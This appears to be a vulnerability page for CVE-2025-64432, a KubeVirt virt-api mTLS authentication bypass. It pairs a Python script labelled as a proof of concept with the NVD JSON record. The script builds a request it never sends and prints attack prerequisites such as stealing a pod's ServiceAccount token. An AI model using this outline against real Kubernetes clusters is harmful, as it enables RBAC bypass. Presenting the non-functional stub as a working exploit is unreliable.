CVE-2025-64432

#!/usr/bin/env python3 """ CVE-2025-64432 PoC - KubeVirt mTLS Authentication Bypass This PoC demonstrates the authentication bypass in KubeVirt's virt-api component. Note: This is for educational and authorized testing purposes only. """ import ssl import socket import json from datetime import datetime def create_malicious_request(target_host, target_port, service_account_token): """ Create a malicious request that exploits the CN validation bypass. The attacker uses their own ServiceAccount certificate to impersonate the Kubernetes API server. """ # Construct HTTP request to virt-api aggregated endpoint request = f"""POST /apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances HTTP/1.1 Host: {target_host}:{target_port} Authorization: Bearer {service_account_token} Content-Type: application/json Content-Length: 0 """ return request.encode('utf-8') def exploit_cve_2025_64432(): """ Main exploitation function for CVE-2025-64432 """ target_host = "kubevirt-api-service.namespace.svc" target_port = 6443 print("[*] CVE-2025-64432 KubeVirt Authentication Bypass PoC") print(f"[*] Target: {target_host}:{target_port}") print("[*] Exploiting CN field validation bypass in mTLS authentication...") # Note: In real attack scenario: # 1. Attacker obtains a ServiceAccount token from compromised pod # 2. Attacker uses their own TLS client certificate # 3. The certificate CN is NOT validated against allowed values # 4. This allows bypassing RBAC controls # This PoC simulates the concept without actual exploitation print("[!] This is a demonstration script for authorized testing only") print("[!] Actual exploitation requires:") print(" 1. Access to a pod within the Kubernetes cluster") print(" 2. Ability to create/modify TLS certificates") print(" 3. Network access to virt-api service") print("[*] Vulnerability: Missing CN validation in virt-api mTLS handling") print("[*] Impact: RBAC bypass, unauthorized VM access/creation") if __name__ == "__main__": exploit_cve_2025_64432()

{"cve": {"id": "CVE-2025-64432", "sourceIdentifier": "[email protected]", "published": "2025-11-07T19:16:26.833", "lastModified": "2025-11-25T15:56:30.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer's authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1."}, {"lang": "es", "value": "KubeVirt es un complemento de gestión de máquinas virtuales para Kubernetes. Las versiones 1.5.3 e inferiores, y 1.6.0 contenían una implementación defectuosa del flujo de autenticación de la capa de agregación de Kubernetes que podría permitir la elusión de los controles RBAC. Se descubrió que el componente virt-API no logra autenticar correctamente al cliente al recibir solicitudes de API a través de mTLS. En particular, no logra validar el campo CN (Common Name) en los certificados TLS del cliente recibidos contra el conjunto de valores permitidos definidos en el configmap 'extension-apiserver-authentication'. La falta de validación de ciertos campos en el certificado TLS del cliente puede permitir a un atacante eludir los controles RBAC existentes al comunicarse directamente con el servidor API agregado, suplantando al servidor API de Kubernetes y su componente agregador. Este problema está corregido en las versiones 1.5.3 y 1.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "1.5.3", "matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:*", "matchCriteriaId": "7AC531A2-1D99-4F6E-8C95-57B3B6B15681"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:*", "matchCriteriaId": "3A5C8C2B-705D-435E-93A7-0523DC4A97BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:*", "matchCriteriaId": "A6326DB3-2CBC-4B85-94C8-9F2B2B458548"}]}]}], "references": [{"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}